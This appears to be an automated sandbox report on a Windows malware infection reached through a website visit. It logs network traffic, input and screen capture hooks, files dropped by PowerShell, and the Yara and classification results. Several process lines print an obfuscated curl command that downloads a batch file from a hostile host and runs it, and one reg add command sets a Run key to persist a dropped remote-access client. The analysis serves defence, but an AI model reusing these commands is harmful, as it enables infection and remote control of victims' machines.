                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49742 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49779 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49780 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49781 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.17:49782 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49783 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49785 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49787 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 52.140.48.131:443 -> 192.168.2.17:49786 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49788 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49789 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 193.111.208.110:443 -> 192.168.2.17:49794 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 35.206.121.228:443 -> 192.168.2.17:49795 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.204.88.70:443 -> 192.168.2.17:49799 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49803 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.17:49804 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Installs a global event hook (focus changed)
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULLJump to behavior
                                  Installs a global keyboard hook
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 0 keyboard low level C:\Windows\system32\osk.exeJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4568 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 0 shell C:\Windows\system32\OskSupport.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 0 mouse low level C:\Windows\system32\osk.exeJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 0 keyboard low level C:\Windows\system32\osk.exeJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 4284 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 6740 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 6740 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,37_2_1101F6B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,37_2_1101F6B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,37_2_11032EE0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,37_2_110321E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,37_2_110076F0
                                  Source: C:\Windows\System32\osk.exeWindows user hook set: 0 mouse low level C:\Windows\system32\osk.exeJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,37_2_11113880
                                  Source: Yara matchFile source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Contains functionalty to change the wallpaper
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,37_2_111158B0

                                  System Summary

                                  barindex
                                  Powershell drops PE file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\client32.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11115750: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,37_2_11115750
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,37_2_1115DB40
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,37_2_1102D330
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7E11D834_2_00007FFC8B7E11D8
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7FAB6F34_2_00007FFC8B7FAB6F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7F302034_2_00007FFC8B7F3020
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7F702134_2_00007FFC8B7F7021
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7EC87034_2_00007FFC8B7EC870
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7EBF8534_2_00007FFC8B7EBF85
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7F2F4534_2_00007FFC8B7F2F45
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7FB75934_2_00007FFC8B7FB759
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7F2F6534_2_00007FFC8B7F2F65
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA325B034_2_00007FFC8BA325B0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA44C2D34_2_00007FFC8BA44C2D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA84B8034_2_00007FFC8BA84B80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA453E534_2_00007FFC8BA453E5
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA37A4434_2_00007FFC8BA37A44
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA4299534_2_00007FFC8BA42995
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA397D034_2_00007FFC8BA397D0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA4EF0834_2_00007FFC8BA4EF08
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA506EA34_2_00007FFC8BA506EA
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA525A134_2_00007FFC8BA525A1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA354D534_2_00007FFC8BA354D5
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCC4C5534_2_00007FFC8BCC4C55
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD6C5B34_2_00007FFC8BCD6C5B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD73CD34_2_00007FFC8BCD73CD
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD7A2D34_2_00007FFC8BCD7A2D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCD9BD34_2_00007FFC8BCCD9BD
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD703D34_2_00007FFC8BCD703D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCF03134_2_00007FFC8BCCF031
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCC5F1B34_2_00007FFC8BCC5F1B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCC72D34_2_00007FFC8BCCC72D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCFE6D34_2_00007FFC8BCCFE6D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD661B34_2_00007FFC8BCD661B
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCCE2D34_2_00007FFC8BCCCE2D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD75AD34_2_00007FFC8BCD75AD
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD156D34_2_00007FFC8BCD156D
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCC552934_2_00007FFC8BCC5529
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCC74C034_2_00007FFC8BCC74C0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BE1A8D734_2_00007FFC8BE1A8D7
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF53CD134_2_00007FFC8BF53CD1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF542CC34_2_00007FFC8BF542CC
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF5000A34_2_00007FFC8BF5000A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF5B04934_2_00007FFC8BF5B049
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF59C7134_2_00007FFC8BF59C71
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCB34134_2_00007FFC8BCCB341
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCB2C234_2_00007FFC8BCCB2C2
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCC00C134_2_00007FFC8BCC00C1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110733B037_2_110733B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11061C9037_2_11061C90
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1103301037_2_11033010
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116322037_2_11163220
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102959037_2_11029590
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1102B5F037_2_1102B5F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116748537_2_11167485
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110454F037_2_110454F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101B76037_2_1101B760
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111258B037_2_111258B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101BBA037_2_1101BBA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11087C6037_2_11087C60
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116DFCB37_2_1116DFCB
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1107009037_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1108048037_2_11080480
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115E98037_2_1115E980
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101C9C037_2_1101C9C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110088AB37_2_110088AB
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11050D8037_2_11050D80
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8A98037_2_6CC8A980
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB491037_2_6CCB4910
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC984F037_2_6CC984F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB452837_2_6CCB4528
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCBA06337_2_6CCBA063
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB415637_2_6CCB4156
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA43C037_2_6CCA43C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB3DB837_2_6CCB3DB8
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB392337_2_6CCB3923
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8DBA037_2_6CC8DBA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8176037_2_6CC81760
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCAD70F37_2_6CCAD70F
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11146450 appears 616 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97C70 appears 34 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CCA9480 appears 52 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 110278E0 appears 47 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97A90 appears 56 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 1116F010 appears 37 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11029450 appears 1009 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC86F50 appears 155 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 111603E3 appears 41 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97D00 appears 120 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC830A0 appears 48 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 1105DD10 appears 291 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11081BB0 appears 44 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11164010 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CCAF3CB appears 31 times
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
                                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.win@57/404@120/19
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11059C50 GetLastError,FormatMessageA,LocalFree,37_2_11059C50
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,37_2_1109D440
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,37_2_1109D4D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,37_2_11115B70
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11089150 FindResourceA,LoadResource,LockResource,37_2_11089150
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,37_2_11127E10
                                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.iniJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\osk.exeMutant created: \Sessions\1\BaseNamedObjects\OSKRunning
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz3rpg3v.cj5.ps1Jump to behavior
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
                                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                                  Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
                                  Source: chrome.exe, 00000000.00000002.2473488281.000028EC02ABE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
                                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
                                  Source: unknownProcess created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
                                  Source: unknownProcess created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
                                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
